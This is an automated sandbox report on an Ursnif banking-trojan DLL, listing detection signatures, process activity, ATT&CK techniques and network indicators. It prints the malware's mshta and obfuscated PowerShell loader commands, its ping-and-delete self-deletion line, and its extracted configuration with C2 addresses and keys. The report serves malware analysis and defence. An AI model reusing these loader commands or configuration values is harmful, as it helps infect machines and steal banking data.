Windows
Analysis Report
pDut.azdgC
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 2760 cmdline: loaddll32.exe "C:\Users\user\Desktop\pDut.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
  - cmd.exe (PID: 3632 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
  - rundll32.exe (PID: 344 cmdline: rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  - control.exe (PID: 720 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  - explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  - cmd.exe (PID: 5996 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  - conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - PING.EXE (PID: 5324 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  - RuntimeBroker.exe (PID: 4168 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  - WerFault.exe (PID: 5464 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  - WerFault.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 260 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  - WerFault.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 268 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 3920 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wefk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wefk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  - powershell.exe (PID: 6736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
  - conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - csc.exe (PID: 6580 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  - cvtres.exe (PID: 2080 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B19.tmp" "c:\Users\user\AppData\Local\Temp\CSC9452DD6E90C74A5284F45229D37BC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  - csc.exe (PID: 6020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  - cvtres.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52D7.tmp" "c:\Users\user\AppData\Local\Temp\CSCE5529B6452BD443991E7FB86A88433C.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cmd.exe (PID: 2396 cmdline: C:\Windows\system32\cmd.exe /c wevtutil qe "application" /c:100 /rd:false MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/22/22-15:33:01.649952 |
SID: | 2033204 |
Source Port: | 49746 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:32:39.565574 |
SID: | 2033203 |
Source Port: | 49728 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:32:59.896476 |
SID: | 2033203 |
Source Port: | 49746 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:33:00.692984 |
SID: | 2033203 |
Source Port: | 49746 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_05243072 |
Source: | Static PE information: |
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: |
Source: | Network Connect: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: |
Source: | Code function: | 3_2_05244CC6 |
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 3_2_05243072 |
System Summary |
---|
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | 3_2_0524475F | |
Source: | Code function: | 3_2_0524198A | |
Source: | Code function: | 3_2_0524821C |
Source: | Code function: | 3_2_052425D7 | |
Source: | Code function: | 3_2_05244695 | |
Source: | Code function: | 3_2_05243A9C | |
Source: | Code function: | 3_2_05248441 |
Source: | Binary or memory string: |
Source: | Key opened: |
Source: | Section loaded: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: |
Source: | Key value queried: |
Source: | File created: |
Source: | File created: |
Source: | Classification label: |
Source: | File read: |
Source: | Section loaded: |
Source: | Code function: | 3_2_05246DB6 |
Source: | Process created: |
Source: | Mutant created: |
Source: | File read: |
Source: | Key opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 3_2_05247E29 | |
Source: | Code function: | 3_2_0524821B | |
Source: | Code function: | 3_2_0524B301 |
Source: | Static PE information: |
Source: | Process created: |
Source: | File created: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: |
Source: | Process created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: |
Source: | Thread sleep time: |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: |
Source: | Thread delayed: |
Source: | Window / User API: |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Process queried: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory protected: | ||
Source: | Memory allocated: |
Source: | Memory written: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Binary or memory string: | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 3_2_052412D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_052439B5 |
Source: | Code function: | 3_2_0524515F |
Source: | Code function: | 3_2_052412D3 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 812 Process Injection | 1 DLL Side-Loading | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Masquerading | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 812 Process Injection | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
31% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | | false | | unknown |
| | | false | | low |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 613867 |
Start date and time: | 2022-04-22 15:30:49 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | pDut.azdgC (renamed file extension from azdgC to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 40 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@28/28@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.89.179.12, 13.107.43.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 3920 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: pDut.dll
Time | Type | Description |
---|---|---|
15:32:22 | API Interceptor | |
15:32:25 | API Interceptor | |
15:33:17 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
146.70.35.138 | Get hash | malicious | Browse | ||
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | Get hash | malicious | Browse |
| |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENET-1ZA | Get hash | malicious | Browse |
| |
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5ae826728d25cb185b65052fe76417bde20f1c2_7cac0383_1a83caea\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8434196145811474 |
Encrypted: | false |
SSDEEP: | 96:8tXpFOdxnYymy9haOKzfopXIQcQOsc6OguQcE5cw3ap+a+z+HbHgDAS/YyNLLTWc:89pU7ntHbFDOBj+q/u7siS274ItW |
MD5: | 56921B5C29BCE3290C2A55A4193019BD |
SHA1: | C410526F79162DBF32EC3E797AC7C9E0B647BE01 |
SHA-256: | 66DBC700CB42C7E6360D8952A9039F3388A149FE2E1117A93437D39FBA11A559 |
SHA-512: | B793CDE4D0372D442B2082A26D8B8AE0ECD9089C6C6B147B68ED4D6EB737ACD62D88719C6AEB38823271F988A089D45BCE972B7EA2BC429BD65B9B63784C5961 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_64868dc4c92d6a6e56598a58e1863903bd4390_7cac0383_19679841\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.847408015250028 |
Encrypted: | false |
SSDEEP: | 96:8mDXyFIxnYyHy9haoB7JnOpXIQcQGc6McE+cw3/7+a+z+HbHgDAS/YyNLLTWbSm8:8Cykn7HoIE/j+q/u7siS274ItW |
MD5: | 9C653FDEC75763A0DCF04AE2E88ACC1A |
SHA1: | 576C1FAE4E218644778AB50AB84BD5D1E22564A2 |
SHA-256: | 36F2A64ED44CC9EF4D0B62F4C8AD3B0AE37A32422E4DCA17C22AA34FA2E07F1E |
SHA-512: | E851016C30A4726E5D20912AA59A6E80CC9ADA834D82C1A77E069733E9DDFCAEA751B8C6895469673238F6CB83DF9914517D3432F11ADD625828974E1725A242 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d4707724df8dacf8df1a948061d31053afc578b_7cac0383_150f7325\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8399487668753685 |
Encrypted: | false |
SSDEEP: | 96:xXZ5oxnYyly9haOK7ESZpXIQcQGc6McE+cw3/7+a+z+HbHgDAS/YyNLLTWbSm9nG:xJ5ynpHoIE/j+q/u7s9S274Itb |
MD5: | DC16DE292ADCE55F394906706906F1B4 |
SHA1: | 0C0C20D4311C5A888C018D4151AE999CF3BD0771 |
SHA-256: | BF5E4A761CEA8B9852C21C4DC9DFE4E38617ED866E46F5249D7DF0877DF99B60 |
SHA-512: | 90F778E9129A50324F243613C76D08F2DE173F59A3FC24B3BBC7422F17FA44241C43ED671CC2FDFE0D82F879AC7EDA16423459B0C25786349DEC5ED26D493418 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 45310 |
Entropy (8bit): | 1.943626314248008 |
Encrypted: | false |
SSDEEP: | 192:fJo8O50EyDeihOfMYGbGQkfLZC8Y7j9N6nZqxxm6cBrSB:xoWEWAfZYGQkfLZxY7jv6nZqTMrE |
MD5: | 43723A7270EF8857BB357E7DAE11DFA4 |
SHA1: | 8E0EA5471ED95AB2D4EB34BDBDB69617E9D0F189 |
SHA-256: | 3D9C095B96790530F49618B748056A5A15C76D6B1C62B97D39B01A7CB0441E6B |
SHA-512: | 344A6844FFC7811174C9C50BC96BD5CB8327C0758DED1F3A14087AE298A856AF29A0B22D5CB4EDBE692684B4477C68D39F668B152D63A6CD43A72F3E69238CDB |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8342 |
Entropy (8bit): | 3.6885815839758767 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiZl6b6YWvSU2FRjDgmfFSSCpNL89bII1flnYm:RrlsNib6b6YuSU2FxgmfFSAIyfv |
MD5: | C4623212D2D8A55C5B51D114D199C723 |
SHA1: | 734E9B7C18A0F2A14E12D8F065C3A08209624C26 |
SHA-256: | CCF726C10213456045FA91C35B3974517641EC67BFA81BD5E140177FC90EA76B |
SHA-512: | 69CAE182265A30EBB9F6ABABDBB30C52CB5827F03C7173BBC5D8BF597CE44ED36EE88F758062B4ABEDAF6B2F77FF7ECC4F8B942232267B5C69225C9C7DA7EC1C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4653 |
Entropy (8bit): | 4.41806910678219 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsgJgtWI9cyWgc8sqYjhd8fm8M4J2+gFZYKK+q8vQ+jKcQIcQw0Md:uITfmnTgrsqY1qJUvKKnKkw0Md |
MD5: | 66E21AD43148B27CB4B19BA4551D4AB9 |
SHA1: | C42D88904E94ACDEF29E53FFA57DF7F6CD4E3449 |
SHA-256: | D4FF2AADABE9BC090678E89A653358CDC142D627D532F928446E7CDB2BD58AF2 |
SHA-512: | 30993CAE556B07749783F991B2E57890E64801828F8029DDDC0E0780C663F7D5319F1973A424E2924DE465B9E3F91E373F75E1BD9295E94CAD6B66898D7BA346 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 45110 |
Entropy (8bit): | 1.9235552325255547 |
Encrypted: | false |
SSDEEP: | 192:SJozG50EyDwFOfMYlGrW8jyZC8Y779N62iwOqpr0T18cZ+:ioNEWwofZlGrW8jyZxY77v62ic |
MD5: | 76460AF42E555ED7900582F344D9F781 |
SHA1: | B0727785F12317E012CCC4180308A49119EF4DD0 |
SHA-256: | 44B0A97F50D2AD6CC18182D42D2C23C3AECB97F646A90C8E53BDE80C833B178B |
SHA-512: | E2802F65CF9304605C1E3D50C68A21F603168E20FC0DF99BDCCCF0DC116A5AF6D2960DD1FB6E19E9ABE7AC062D9523415819B4C3EAA2FE91FA127956321CC2F3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8338 |
Entropy (8bit): | 3.6989921773934844 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiZjl6G6YW5SUTFlgmfLSSCprl89b/Isfk1m:RrlsNiNl6G6Y4SUTFlgmfLS4/7fb |
MD5: | 0ADE1D17712DC00E5C7947B5DB857E49 |
SHA1: | 5D81902E11D9A85C0E5BCA3F9463B18149611C27 |
SHA-256: | 3E9FA15134276B82A787EC3375A86A8953B85ABC0ECFBCE44F2669F3009E6751 |
SHA-512: | 6B0D69673A2AEB023E5C46FF64801F34240EBB740BC6EB15DBB75C56AC2B8E1391F40AC46552DA0576FDD336DB69C6028B4FE18FAD3CF8390E30EF88450F6A3F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.470627968403778 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsgJgtWI9cyWgc8sqYjhhY8fm8M4J2+MZFlm+q84lB2KcQIcQw0td:uITfmnTgrsqY1bJGBmH2Kkw0td |
MD5: | BD4C71FB9FC1D1070EFE7B58946BCFBE |
SHA1: | B13D30D5BEEAA403A4DD576B12641A2E514C41EF |
SHA-256: | 4D8F51FA448EE9D38655B992DF7D4EE438D786731DD21EC8611DF222DB03B077 |
SHA-512: | 3D11195A5B48F09939CB04AD82826218DD533F62000B887CDB64B513FDB415B5B7E4B873D03496DB0FEC9A6EC71BF249E70DDC24A9F87A45BE4A5C0D63632989 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41686 |
Entropy (8bit): | 1.8151092865658691 |
Encrypted: | false |
SSDEEP: | 192:2JoQX/50EyD26hoNOfMY2GeeY7+9N6CnCzRqrpF9hrj:WoQWEWx1fZ2GeeY7+v6AN3 |
MD5: | 7CD3E510B2558DC9B6E46F7239DE32D5 |
SHA1: | B1B6EB963E8A9FB424D10B8F7BD8374C53817D52 |
SHA-256: | D92CC71EAD1846AB37D5113CA9D134320183E2CB73F993B4698392CD79212AFF |
SHA-512: | E70D484B2EC03858E2FC1CF10663D40E986DD8B7735142C554DFAE7D777CC5B362752C90EE666E6D8D7FC17887DD8F038A443B754D03139402668230BA2D3DC2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8286 |
Entropy (8bit): | 3.6894428129568015 |
Encrypted: | false |
